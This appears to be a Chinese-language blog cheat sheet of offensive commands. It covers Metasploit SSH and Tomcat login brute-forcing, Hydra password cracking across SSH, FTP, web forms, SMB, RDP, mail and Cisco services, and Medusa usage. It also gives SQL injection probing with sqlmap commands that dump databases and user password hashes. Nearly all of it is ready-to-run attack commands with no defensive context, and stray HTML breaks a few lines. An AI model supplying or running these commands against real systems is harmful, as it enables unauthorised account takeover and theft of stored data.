使用命令: 破解ssh登录名和密码
msconsole回车
search ssh 查找ssh相关的模块
use auxiliary/scanner/ssh/ssh_login 调用ssh破解程序
show options 查看选项
set rhosts 127.0.0.1 设置要破解的IP地址(必须能ping通)
set rport 22 设置端口
set username root 设置用户名
set pass_file /root/*.* 设置密码文件
set threads 50 设置线程50
run 开始执行
telnet同理,
kali自带密码字典路径//usr/share/wordlists/w3af.txt
Hydra破解
1、破解ssh:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh
2、破解ftp:
hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV
3、get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.PHP
4、post方式提交,破解web登录:
hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=USER&password=PASS&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=USER&passwd=PASS:
wrong username or password"
(参数说明:-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止, 10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,中的内容是表示错误猜解的返回信息提示。)<br>
5、破解https:<br>
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https<br>
6、破解teamspeak:<br>
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak<br>
7、破解cisco:<br>
hydra -P pass.txt 10.36.16.18 cisco<br>
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable<br>
8、破解smb:<br>
hydra -l administrator -P pass.txt 10.36.16.18 smb<br>
9、破解pop3:<br>
hydra -l muts -P pass.txt my.pop3.mail pop3<br>
10、破解rdp:<br>
hydra ip rdp -l administrator -P pass.txt -V<br>
11、破解http-proxy:<br>
hydra -l admin -P pass.txt http-proxy://10.36.16.18<br>
12、破解imap:<br>
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN<br>
hydra -C defaults.txt -6</p>
<p>Medusa暴力破解远程<br>
kali linux自带破解工具,使用的时候要获得一些必要的信息。<br>
1、目标IP地址<br>
2、登录目标的一个用户名或者一个用户名文件(都是猜测的用户名也可以说是用户名字典)<br>
3、密码字典<br>
4、要验证的服务名称(比如ssh、http、telnet等)<br>
使用命令:<br>
medusa -h target_ip(攻击ip) -u username -P path_to_passwordlist(密码文件要打绝对路径) -M authentication_service_to_attack(要验证的服务名称)<br>
-u是要攻击的目标的id(用户名)号,如果改为大写的U,将会是利用用户名列表进行攻击,-M参数后面接的是你要攻击的验证服务名称。</p>
<p>payload破解<br>
search tomcat查看tomcat的payload<br>
payload就是加载模块调用攻击的有效加载项。(真心抽象)<br>
msfconsole回车<br>
use auxiliary/scanner/http/tomcat_mgr_login 调用tomcat破解程序<br>
show options 查看选项<br>
set rhosts 127.0.0.1 设置要破解的IP地址(必须能ping通)<br>
set rport 8080 设置端口<br>
set username root 设置用户名(set user_file /<em>/</em>.<em>设置帐号字典)<br>
set pass_file /root/</em>.* 设置密码字典<br>
set threads 50 设置线程50<br>
run 开始执行。</p>
<hr>
<p>sqlmap:数据库注入工具。<br>
可以用来猜测数据库类型和利用漏洞渗透数据库<br>
注入点一般存在登录页面、查找页面或添加页面等用户可以查找或修改数据的地方。<br>
比如:最常用的寻找SQL注入点的方法,是在网站中寻找如下形式的页面链接:<a href="http://www.xxx.com/xxx.asp?id=YY" target="_blank">http://www.xxx.com/xxx.asp?id=YY</a><br>
其中“YY”可能是数字,也有可能是字符串,分别被称为整数类型数据或者字符型数据。<br>
一般有一下几种方法:<br>
1、加 ' 法<br>
浏览器可能会返回类似于下面的错误提示信息:Microsoft JET Database Engine 错误’80040e14表示有注入点。<br>
2、and 1=1 和and 1=2 将and 1=1 写在url最后面访问显示正常,而and 1=2 提示错误说明有可能有注入点。如果两种方式结果一样,就表示没戏。<br>
3、sqlmap下输入 (-u "域名" --level 5 --dbs) 猜测数据库类型<br>
Sqlmap参数使用<br>
BT5里面的话前面就要加python<br>
sqlmap.py -u url --dbs //爆数据库<br>
sqlmap.py -u url --current-db //爆当前库<br>
sqlmap.py -u url --current-user //爆当前用户<br>
sqlmap.py -u url --users 查看用户权限<br>
sqlmap.py -u url --tables -D 数据库 //爆表段<br>
sqlmap.py -u url --columns -T 表段 -D 数据库 //爆字段<br>
sqlmap.py -u url --dump -C 字段 -T 表段 -D 数据库 //猜解<br>
sqlmap.py -u url --dump --start=1 --stop=3 -C 字段 -T 表段 -D 数据库 //猜解1到3的字段<br>
加入python环境使用方法:<br>
sqlmap.py -u url 判断<br>
sqlmap.py -u url --is-dba -v 这是判断当前数据库的使用者是否是dba<br>
sqlmap.py -u url --users -v 0 这句的目的是列举数据库的用户<br>
sqlmap.py -u url --passwords -v 0这句的目的是获取数据库用户的密码<br>
sqlmap.py -u url --privileges -v 0 这是判断当前的权限<br>
sqlmap.py -u url --dbs -v 0 这句的目的是将所有的数据库列出来<br>
sqlmap.py -u url --tables -D '表' 爆表<br>
sqlmap.py -u url --columns -T ‘表’-D ‘数据库’爆列<br>
sqlmap.py -u url --dump -T '表' --start 1 --stop 4 -v 0 这里是查询第2到第4行的内<br>
sqlmap.py -u url --dump -all -v 0 爆数据库<br>
sqlmap.py -u url --users --password 爆用户名密码。</p>
<hr>
</font>
...............................................................认真写每篇博客,如同我对待生活............................................................